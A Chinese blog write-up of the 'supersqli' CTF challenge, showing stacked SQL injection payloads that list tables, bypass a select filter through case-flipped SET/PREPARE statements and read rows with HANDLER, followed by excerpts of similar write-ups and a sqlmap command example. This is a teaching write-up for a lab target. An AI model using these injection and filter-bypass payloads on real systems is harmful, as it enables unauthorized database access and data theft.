supersqli(sql注入)

最新推荐文章于 2025-01-17 21:33:56 发布
最新推荐文章于 2025-01-17 21:33:56 发布
阅读量1k 收藏 1
点赞数
分类专栏: CTF
原文链接:https://blog.youkuaiyun.com/nicesa/article/details/106390405
版权

12 supersqli(sql注入)

知识点

  1. 堆叠注入是重点
  2. 预编译 https://blog.youkuaiyun.com/Just__2009/article/details/109126437

在这里插入图片描述
在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。 堆叠的语句是任意的而union只能用来查询

堆叠注入原理

1.输入1’发现不回显,然后1’ #显示正常,应该是存在sql注入了
使用单引号报错,说明有注入的漏洞
error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’’’’ at line 1

‘1 order by 2# 然后试试

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
order by 2的时候页面正常回显,order by 3的时候页面出错,所以我们知道只有两个字段。

使用这种—1’ union select 1,2#
在这里插入图片描述

发现select 被过滤了。

叠合注入

-1’;show tables # 显示表有哪些

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
所以我们找到flag在第一个表中,那么接下来我们要查看flag中的内容,但是这里select被过滤了,所以我们必须得绕过这个过滤,怎么绕过呢?我们可以采用预编译的方式进行绕过。

-1’;set @sql = CONCAT(‘sele’,‘ct * from 1919810931114514;’);prepare aaa from @sql;EXECUTE aaa;#

但是当我们执行预编译语句的时候出现下图结果:
在这里插入图片描述

所以这里还同时过滤了set和prepare,那我们同时也要绕过它,如何绕过,我们可以采用大小写的形式进行绕过(经尝试,双写无法绕过)

1’;sEt @sql = CONCAT(‘sele’,‘ct * from 1919810931114514;’);prepArE aaa from @sql;EXECUTE aaa;#
在这里插入图片描述
到这里,拿到flag

方法2
handler查询

mysql可以使用select查询表中的数据,也可使用handler语句,这条语句是一行一行的浏览一个表中的数据。
handler可以用于MyISAM和InnoDB表。
使用方法:
handler table_name open打开一张表
handel table_name read first读取第一行内容,
handel table_name read next依次获取其它行
最后一行执行之后再执行handel table_name read next会返回一个空的结果。

-1’;handler 1919810931114514 open;handler 1919810931114514 read first;#

上面payload是两个语句,一个是打开表,一个是读表中的第一行字段中的内容
在这里插入图片描述
方法4
这里看到别人分享的一个解题思路,感觉姿势挺独特,介绍一下
修改表名和列名

【网络安全 | CTF】攻防世界 supersqli 解题详析
等风来
05-27 5071
堆叠注入(stacked injection)是一种SQL注入攻击的技术手段,它会在同一行代码中多次使用已知的SQL注入漏洞,从而达到绕过安全措施、执行恶意代码和窃取数据库信息等目的。堆叠注入攻击利用了SQL语句的连贯性,通过在查询语句中嵌入多个SELECT语句或在UPDATE语句中嵌入多个SET赋值的情况来强行插入额外的恶意代码段。表示注释掉其后面的内容,因此程序会执行两次SQL语句,并忽略掉密码的条件,最终返回敏感数据的行数,从而达到了窃取数据库敏感信息的目的。断开原有语句,再插入新的SQL语句。
小白SQL注入基础入门详细解析
m0_55479420的博客
03-31 310
1.SQL分类 基于变量数据类型分 数字型注入 字符型注入 '' ' ) ') 搜索型注入 %’ JSON型注入(判断是数字还是字符 考虑要不要闭合 JSON={"XINGMING":"DUMP' and 1=2 union select 1,database(),2 #"} 很多人学习python,不知道从何学起。 很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手。 很多已经做案例的人,却不知道如何去学习更加高深的知识。 那么针对这三类人,我给大家提供一个好的学习平台,免费
SuperSQL注入.rar
07-21
一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 1.支持任意地点出现的任意SQL注入 2.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 3.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 4.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
supersqli
怪味巧克力的博客
05-27 4601
0x01 拿到题目后,发现是单引号报错字符型注入 order by 2的时候页面正常回显,order by 3的时候页面出错,所以我们知道只有两个字段。 接下来union联合查询,发现select被过滤了 所以我们需要绕过select的过滤,下面有几种方法 0x02 堆叠查询+预编译 我们发现这里可以执行多sql语句,所以我们可以采用堆叠查询,那我们查询表名,结果如下: 查询表名中的列名,结果如下: 所以我们找到flag在第一个表中,那么接下来我们要查看flag中的内容,但是这里select被过滤了
SuperSQL:跨数据源、跨DC、跨执行引擎的高性能大数据SQL中间件
腾讯技术工程
09-23 1834
导语:SuperSQL是腾讯数据平台部自研的跨数据源、跨数据中心、跨执行引擎的统一大数据SQL分析平台/中间件,支持对接适配多类外部开源SQL执行引擎,如Spark、Hi...
supersqliSQL注入流程及常用SQL语句)
Welcome To Myon'Blog !
03-30 1119
一、SQL注入知识学习 1、判断注入类型 (1)数字型注入判断 (2)字符型注入判断 2、猜解sql查询语句中的字段数(order by 的使用) 3、判断显示位爆数据库的名字 4、注释(--+的使用) 5、堆叠注入 6、handler语句及用法 二、基于上述知识对此题的分析与解答 1、注入点、注入类型 2、判断列数 3、利用or 1=1暴露表中数据 联合注入 (1)看数据库 (2)查表名 (3)查询表中的列 6、处理被过滤 7、handler、hackba的使用
Xctf练习sql注入--supersqli
weixin_45694388的博客
12-28 339
三种方法 方法一 =1 回显正常 =1’回显不正常,报sql语法错误 =1’ --+ 回显正常,说明有sql注入点,应该是字符型注入(# 不能用) =1’ order by 3 --+ 回显失败,说明有2个注入点 =1’ union select 1,2 --+ 回显显示过滤语句: =1’; show databases --+ 爆数据库名 =-1’; show tables --+ 绕过过滤,显示表下的列名 =1’;show columns from words --+ 尝试堆叠
2025.1.16——三、supersqli 绕过|堆叠注入|handler查询法|预编译绕过法|修改原查询法
2402_87387800的博客
01-17 1387
查看源码,发现一句话:用sqlmap是没有灵魂的。所以可以先用sqlmap跑一下,然后尝试手工注入
小白SQL注入基础入门(持续修改)
MSB_WLAQ的博客
10-12 476
1.SQL分类 基于变量数据类型分 数字型注入 字符型注入 '' ' ) ') 搜索型注入 %’ JSON型注入(判断是数字还是字符 考虑要不要闭合 JSON={"XINGMING":"DUMP' and 1=2 union select 1,database(),2 #"} 基于获取数据的方法 基于回显 基于错误 盲注 布尔型盲注 时间盲注 基于注入点位置分类(请求方法) 注入要判断是否有干扰 GET注入 Cookie注入 POST注入(登录框)REQUEST 注入 (全部接受) H
SuperSQLEXEC
04-02
SuperSQLEXEC
supersqlite:Python的增强型SQLite库
02-24
SuperSQLite:一个用于Python的增强SQLite库 一个功能丰富的Python软件包,可用于通过在Python中利用SQLite。 它旨在代替Python的内置 ,但没有任何限制。 它提供了独特的功能,例如以及。 SuperSQLite还与针对SQLite的预编译本机二进制文件一起打包,并且几乎针对每个平台都具有所有扩展名,以避免在安装过程中出现任何C / C ++编译器错误。 目录 安装 您可以使用pip安装此软件包: pip install supersqlite # Python 2.7 pip3 install supersqlite # Python 3 动机 是使用的快速流行的嵌入式数据库。 它是并且拥有数十亿的部署。 它在Python中具有绑定。 但是,Python绑定通常是针对SQLite的过时副本进行编译的,或者可能在将设置为较低级别的情况下进行编译。
超级SQL注入工具【SSQLInjection】V1.0 正式版 20200527.rar
04-10
超级SQL注入工具【SSQLInjection】V1.0 正式版 20200527
[攻防世界]supersqli
weixin_55466841的博客
04-30 304
输个单引号看看, 可以判断出来是字符型注入。 1' and 1=1# #有回显 1' and 1=2# #无回显 判断列数 1' order by 1# 1' order by 2# ... 2列。 用联合注入发现过滤了好多关键字 接下来用堆叠注入。 1'; show databases;# 1'; show tables;# ';show columns from `1919810931114514`;# ';show colu...
攻防世界-supersqli详解
Mr_helloword的博客
08-11 7139
supersqli 查看是否存在SQL注入 1' and 1=1 # 用二分法查看列数(有两列) 1' order by 2 # 使用联合查询发现做了SQL注入黑名单禁止出现以下关键字
攻防世界XCTF:supersqli
末初 · mochu7
03-13 2494
加个单引号发现报错 比较烦的就是过滤了select 这样就无法进行查数据了,而且这里的/i就是忽略了大小写。无法进行大小写过滤 首先可以通过报错函数,把数据库给注入出来 -1' and extractvalue(1,concat(1,version()))-- + 版本信息:.18-MariaDB 数据库名称:supersqli 然后经过测试发现这里可以执行多条语句,也就是堆叠注入...
攻防世界——supersqli
weixin_62281892的博客
09-18 1957
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。到这里我们的表列名就已经修改完毕,此时还会输出修改完成的words列名,最后通过万能钥匙1' or '1'='1即可得到输出。由于注入框的查询是对列id的搜索,此时参考两个表的列名,需要将flag列名改为能够查找的id列(修改包括名称和数据类型)。上网冲浪了解了一波,好像是类似黑名单,这些词会被替换,那没办法了,我们就用堆叠注入
攻防世界-supersqli
weixin_43960066的博客
03-27 494
由于没有对alter,rename做出过滤,将1919810931114514修改为words,将flag修改为id,同时将words修改为其他的,将id也修改为其他的。由于过滤了一些关键字,所以想要得到flag可采取预编译、修改flag的名字为id修改1919810931114514为words(即可在搜索框中直接输入即可)发现flag在数字表中,同时判断当前正在使用的就是supersqli这个数据库,输入框中输入1就是查询的word表。想要得到flag需要使用的语句为。使用堆叠注入,查看数据库。
supersqli sqlmap
最新发布
04-03
### 如何使用 Sqlmap 进行 SQL 注入渗透测试 Sqlmap 是一种功能强大的开源工具,能够用于自动化检测和利用 SQL 注入漏洞。以下是关于如何配置并运行 Sqlmap 的详细说明。 #### 工具准备 在开始之前,需确保已安装 Sqlmap 并正确设置环境变量以便于调用该工具[^1]。如果尚未完成此操作,则可以通过官方文档获取详细的安装指南。 #### 基本命令结构 执行 Sqlmap 测试的一般语法如下所示: ```bash sqlmap -u URL [其他参数] ``` 其中 `-u` 参数指定目标网站地址,而 `[其他参数]` 则包含了多种选项来调整扫描行为。 #### 配置具体参数 对于特定场景下的 cookie 注入案例分析,比如针对 `SQL labs-Less-20` 中提到的情况,可采用以下命令形式来进行测试[^2]: ```bash sqlmap -u "http://172.168.10.129:8001/Less-11/" --cookie="uname=admin" --level=3 ``` 这里解释一下各个部分的作用: - `-u`: 定义要攻击的目标URL。 - `--cookie`: 提供访问站点所需的会话信息(即 cookies),这对于那些依赖用户登录状态的应用程序尤为重要。 - `--level`: 设置测试强度级别,默认值为 1 ,最高可达 5 。更高的数值意味着更全面但也可能更加耗时的探测过程。 通过上述方法即可启动一次基于 Cookie 的 SQL 注入尝试,并由 Sqlmap 自动寻找潜在的安全隐患。 #### 结果解读与后续行动 一旦扫描结束,Sqlmap 将报告发现的所有问题以及可用的数据提取途径。依据反馈结果采取适当措施修复相应缺陷或者进一步深入研究受影响区域内的敏感资料情况。 ```python import subprocess def run_sqlmap(url, cookies=None, level='3'): command = ['sqlmap', '-u', url, '--level={}'.format(level)] if cookies: command.append('--cookie="{}"'.format(cookies)) result = subprocess.run(command, stdout=subprocess.PIPE) output = result.stdout.decode() return output ``` 以上 Python 脚本片段展示了怎样构建一个简单的函数接口去调用 Sqlmap 执行任务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值